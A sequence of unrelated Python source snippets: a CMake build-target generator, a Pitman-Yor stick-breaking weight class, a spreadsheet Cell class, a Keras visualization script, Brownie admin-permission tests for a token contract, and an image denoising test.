assert not BiiType.isCppHeader(main.extension)
self.main = main
self.files.add(main.cell_name)
self.name = _binary_name(main)
self.block_interface = _binary_name(main.block_name) + "_interface"
self.simple_name = _binary_name(main.cell_name)
def dumps(self):
content = CPPExeTarget.template.format(block_interface=self.block_interface,
exe_name=self.simple_name,
files="\n\t\t\t".join(sorted(self.files)),
deps=" ".join(self.dep_names),
system=" ".join(sorted(self.system)),
paths="\n\t\t\t\t\t".join(self.include_paths))
return content
class CPPBlockTargets(object):
""" All the targets defined in a given block:
- 1 Lib
- N Exes
- There is always an Interface Lib per block, but no parametrization required here
"""
def __init__(self, block_name):
self.block_name = block_name
self.is_dep = False # To indicate if lives in deps or blocks folder
self.data = set()
self.lib = CPPLibTarget(block_name)
self.exes = [] # Of CPPExeTargets
self.tests = set() # Of CPPExeTargets
@property
def filename(self):
return "bii_%s_vars.cmake" % _binary_name(self.block_name)
def dumps(self):
exe_list = """# Executables to be created
SET(BII_BLOCK_EXES {executables})
SET(BII_BLOCK_TESTS {tests})
"""
vars_content = ["# Automatically generated file, do not edit\n"
"SET(BII_IS_DEP %s)\n" % self.is_dep]
vars_content.append(self.lib.dumps())
exes = [t.simple_name for t in self.exes]
tests = [t.simple_name for t in self.tests]
exes_list = exe_list.format(executables="\n\t\t\t".join(sorted(exes)),
tests="\n\t\t\t".join(sorted(tests)))
vars_content.append(exes_list)
for exe in self.exes:
content = exe.dumps()
vars_content.append(content)
return "\n".join(vars_content)
|
31490
|
from ._base import BaseWeight
from ..exceptions import NotFittedError
from ..utils.functions import mean_log_beta
import numpy as np
from scipy.special import loggamma
class PitmanYorProcess(BaseWeight):
def __init__(self, pyd=0, alpha=1, truncation_length=-1, rng=None):
super().__init__(rng=rng)
assert -pyd < alpha, "alpha param must be greater than -pyd"
self.pyd = pyd
self.alpha = alpha
self.v = np.array([], dtype=np.float64)
self.truncation_length = truncation_length
def random(self, size=None):
if size is None and len(self.d) == 0:
raise ValueError("Weight structure not fitted and `n` not passed.")
if size is not None:
if type(size) is not int:
raise TypeError("size parameter must be integer or None")
if len(self.d) == 0:
pitman_yor_bias = np.arange(size)
self.v = self.rng.beta(a=1 - self.pyd,
b=self.alpha + pitman_yor_bias * self.pyd,
size=size)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
else:
a_c = np.bincount(self.d)
b_c = np.concatenate((np.cumsum(a_c[::-1])[-2::-1], [0]))
if size is not None and size < len(a_c):
a_c = a_c[:size]
b_c = b_c[:size]
pitman_yor_bias = np.arange(len(a_c))
self.v = self.rng.beta(
a=1 - self.pyd + a_c,
b=self.alpha + pitman_yor_bias * self.pyd + b_c
)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
if size is not None:
self.complete(size)
return self.w
def complete(self, size):
if type(size) is not int:
raise TypeError("size parameter must be integer or None")
if self.get_size() < size:
pitman_yor_bias = np.arange(self.get_size(), size)
self.v = np.concatenate(
(
self.v,
self.rng.beta(a=1 - self.pyd,
b=self.alpha + pitman_yor_bias * self.pyd)
)
)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
return self.w
def fit_variational(self, variational_d):
self.variational_d = variational_d
self.variational_k = len(self.variational_d)
self.variational_params = np.empty((self.variational_k, 2),
dtype=np.float64)
a_c = np.sum(self.variational_d, 1)
b_c = np.concatenate((np.cumsum(a_c[::-1])[-2::-1], [0]))
self.variational_params[:, 0] = 1 - self.pyd + a_c
self.variational_params[:, 1] = self.alpha + (
1 + np.arange(self.variational_params.shape[0])
) * self.pyd + b_c
def variational_mean_log_w_j(self, j):
if self.variational_d is None:
raise NotFittedError
res = 0
for jj in range(j):
res += mean_log_beta(self.variational_params[jj][1],
self.variational_params[jj][0])
res += mean_log_beta(self.variational_params[j, 0],
self.variational_params[j, 1]
)
return res
def variational_mean_log_p_d__w(self, variational_d=None):
if variational_d is None:
_variational_d = self.variational_d
if _variational_d is None:
raise NotFittedError
else:
_variational_d = variational_d
res = 0
for j, nj in enumerate(np.sum(_variational_d, 1)):
res += nj * self.variational_mean_log_w_j(j)
return res
def variational_mean_log_p_w(self):
if self.variational_d is None:
raise NotFittedError
res = 0
for j, params in enumerate(self.variational_params):
res += mean_log_beta(params[0], params[1]) * -self.pyd
res += mean_log_beta(params[1], params[0]) * (
self.alpha + (j + 1) * self.pyd - 1
)
res += loggamma(self.alpha + j * self.pyd + 1)
res -= loggamma(self.alpha + (j + 1) * self.pyd + 1)
res -= loggamma(1 - self.pyd)
return res
def variational_mean_log_q_w(self):
if self.variational_d is None:
raise NotFittedError
res = 0
for params in self.variational_params:
res += (params[0] - 1) * mean_log_beta(params[0], params[1])
res += (params[1] - 1) * mean_log_beta(params[1], params[0])
res += loggamma(params[0] + params[1])
res -= loggamma(params[0]) + loggamma(params[1])
return res
def variational_mean_w(self, j):
if j > self.variational_k:
return 0
res = 1
for jj in range(j):
res *= (self.variational_params[jj][1] /
self.variational_params[jj].sum())
res *= self.variational_params[j, 0] / self.variational_params[j].sum()
return res
def variational_mode_w(self, j):
if j > self.variational_k:
return 0
res = 1
for jj in range(j):
if self.variational_params[jj, 1] <= 1:
if self.variational_params[jj, 0] <= 1:
raise ValueError('multimodal distribution')
else:
return 0
elif self.variational_params[jj, 0] <= 1:
continue
res *= ((self.variational_params[jj, 1] - 1) /
(self.variational_params[jj].sum() - 2))
if self.variational_params[j, 0] <= 1:
if self.variational_params[j, 1] <= 1:
raise ValueError('multimodal distribution')
else:
return 0
elif self.variational_params[j, 1] <= 1:
return res
res *= ((self.variational_params[j, 0] - 1) /
(self.variational_params[j].sum() - 2))
return res
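# Usage sketch: random()/complete() draw weights via the stick-breaking
# construction w_j = v_j * prod_{i<j} (1 - v_i); with pyd=0 this reduces to the
# Dirichlet-process stick-breaking prior with concentration alpha.
#
#   py = PitmanYorProcess(pyd=0.3, alpha=1.0)
#   w = py.random(size=50)  # 50 truncated stick-breaking weights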
|
31528
|
import sys
if sys.version_info > (3,):
basestring = (str, bytes)
long = int
class DeprecatedCellMixin(object):
"""Deprecated Cell properties to preserve source compatibility with the 1.0.x releases."""
__slots__ = ()
@property
def r(self):
"""The row number of this cell.
.. deprecated:: 1.1.0
Use the ``row_num`` property instead.
"""
return self.row.num
@property
def c(self):
"""The column number of this cell.
.. deprecated:: 1.1.0
Use the ``col`` property instead.
"""
return self.col
@property
def v(self):
"""The value of this cell.
.. deprecated:: 1.1.0
Use the ``value`` or the typed ``*_value`` properties instead.
"""
return self.value
@property
def f(self):
"""The formula of this cell.
.. deprecated:: 1.1.0
Use the ``formula`` property instead.
"""
return self.formula
class Cell(DeprecatedCellMixin):
"""A cell in a worksheet.
Attributes:
row (Row): The containing row.
col (int): The column index for this cell.
value (mixed): The cell value.
formula (bytes): The formula PTG bytes.
style_id (int): The style index in the style table.
"""
__slots__ = ('row', 'col', 'value', 'formula', 'style_id')
def __init__(self, row, col, value=None, formula=None, style_id=None):
self.row = row
self.col = col
self.value = value
self.formula = formula
self.style_id = style_id
def __repr__(self):
return 'Cell(row={}, col={}, value={}, formula={}, style_id={})' \
.format(self.row, self.col, self.value, self.formula, self.style_id)
@property
def row_num(self):
"""The row number of this cell."""
return self.row.num
@property
def string_value(self):
"""The string value of this cell or None if not a string."""
if isinstance(self.value, basestring):
return self.value
@property
def numeric_value(self):
"""The numeric value of this cell or None if not a number."""
if isinstance(self.value, (int, long, float)):
return self.value
@property
def bool_value(self):
"""The boolean value of this cell or None if not a boolean."""
if isinstance(self.value, bool):
return self.value
@property
def date_value(self):
"""The date value of this cell or None if not a numeric cell."""
return self.row.sheet.workbook.convert_date(self.value)
@property
def is_date_formatted(self):
"""If this cell is formatted using a date-like format code."""
fmt = self.row.sheet.workbook.styles._get_format(self.style_id)
return fmt.is_date_format
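# Minimal usage sketch (assumption: standalone demo, not part of the library). It stubs
# the Row interface that Cell expects (`num` and `sheet`) just to exercise the typed
# accessors; real Row objects come from the workbook/worksheet readers.
if __name__ == '__main__':
    class _StubRow(object):
        num = 1
        sheet = None
    demo = Cell(_StubRow(), col=0, value=42.0)
    assert demo.row_num == 1
    assert demo.numeric_value == 42.0
    assert demo.string_value is None   # not a string value
    assert demo.bool_value is None     # not a boolean value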
|
31593
|
import numpy as np
import os
import os.path as path
from keras.applications import vgg16, inception_v3, resnet50, mobilenet
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
import kmri
base_path = path.dirname(path.realpath(__file__))
img_path = path.join(base_path, 'img')
## Load the VGG model
# model = vgg16.VGG16(weights='imagenet')
# normalize_pixels = True
## Load the MobileNet model
# model = mobilenet.MobileNet(weights='imagenet')
# normalize_pixels = True
## Load the ResNet50 model
model = resnet50.ResNet50(weights='imagenet')
normalize_pixels = False
def get_img(file_name):
image = load_img(path.join(img_path, file_name), target_size=(224, 224))
if normalize_pixels:
return img_to_array(image) / 256
else:
return img_to_array(image)
img_input = np.array([get_img(file_name) for file_name in os.listdir(img_path)])
kmri.visualize_model(model, img_input)
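# Hedged alternative (assumption, not part of kmri): the keras.applications modules also
# provide a model-specific preprocess_input, which could replace the manual
# normalize_pixels flag above. Defined here for reference but not called.
def get_img_preprocessed(file_name):
    image = load_img(path.join(img_path, file_name), target_size=(224, 224))
    return resnet50.preprocess_input(img_to_array(image))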
|
31597
|
import brownie
def test_set_minter_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_minter(accounts[2], {"from": accounts[1]})
def test_set_admin_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_admin(accounts[2], {"from": accounts[1]})
def test_set_name_admin_only(accounts, token):
with brownie.reverts("Only admin is allowed to change name"):
token.set_name("Foo Token", "FOO", {"from": accounts[1]})
def test_set_minter(accounts, token):
token.set_minter(accounts[1], {"from": accounts[0]})
assert token.minter() == accounts[1]
def test_set_admin(accounts, token):
token.set_admin(accounts[1], {"from": accounts[0]})
assert token.admin() == accounts[1]
def test_set_name(accounts, token):
token.set_name("Foo Token", "FOO", {"from": accounts[0]})
assert token.name() == "Foo Token"
assert token.symbol() == "FOO"
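# Hedged sketch (assumption): the set_* tests above mutate admin/minter state, so suites
# built on brownie's pytest plugin usually add an autouse isolation fixture in
# conftest.py to roll the chain back between tests, e.g.:
#
# import pytest
#
# @pytest.fixture(autouse=True)
# def isolation(fn_isolation):
#     pass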
|
31602
|
import numpy
from scipy.ndimage import gaussian_filter
from skimage.data import binary_blobs
from skimage.util import random_noise
from aydin.it.transforms.fixedpattern import FixedPatternTransform
def add_patterned_noise(image, n):
image = image.copy()
image *= 1 + 0.1 * (numpy.random.rand(n, n) - 0.5)
image += 0.1 * numpy.random.rand(n, n)
# image += 0.1*numpy.random.rand(n)[]
image = random_noise(image, mode="gaussian", var=0.00001, seed=0)
image = random_noise(image, mode="s&p", amount=0.000001, seed=0)
return image
def test_fixed_pattern_real():
n = 128
image = binary_blobs(length=n, seed=1, n_dim=3, volume_fraction=0.01).astype(
numpy.float32
)
image = gaussian_filter(image, sigma=4)
noisy = add_patterned_noise(image, n).astype(numpy.float32)
bs = FixedPatternTransform(sigma=0)
preprocessed = bs.preprocess(noisy)
postprocessed = bs.postprocess(preprocessed)
# import napari
# with napari.gui_qt():
# viewer = napari.Viewer()
# viewer.add_image(image, name='image')
# viewer.add_image(noisy, name='noisy')
# viewer.add_image(preprocessed, name='preprocessed')
# viewer.add_image(postprocessed, name='postprocessed')
assert image.shape == postprocessed.shape
assert image.dtype == postprocessed.dtype
assert numpy.abs(preprocessed - image).mean() < 0.007
assert preprocessed.dtype == postprocessed.dtype
assert numpy.abs(postprocessed - noisy).mean() < 1e-8
# import napari
# with napari.gui_qt():
# viewer = napari.Viewer()
# viewer.add_image(image, name='image')
# viewer.add_image(noisy, name='noisy')
# viewer.add_image(corrected, name='corrected')
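# Hedged, standalone sketch (no aydin internals assumed): the "fixed pattern" targeted
# above is an axis-aligned offset that repeats across the image. A crude mean-projection
# correction illustrates the idea; aydin's FixedPatternTransform is more involved.
def _toy_fixed_pattern_correction(noisy_image):
    corrected = noisy_image.astype(numpy.float32).copy()
    for axis in range(corrected.ndim):
        other_axes = tuple(a for a in range(corrected.ndim) if a != axis)
        pattern = corrected.mean(axis=other_axes, keepdims=True)  # 1D profile along `axis`
        corrected -= pattern - corrected.mean()                   # remove offset, keep global mean
    return corrected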
|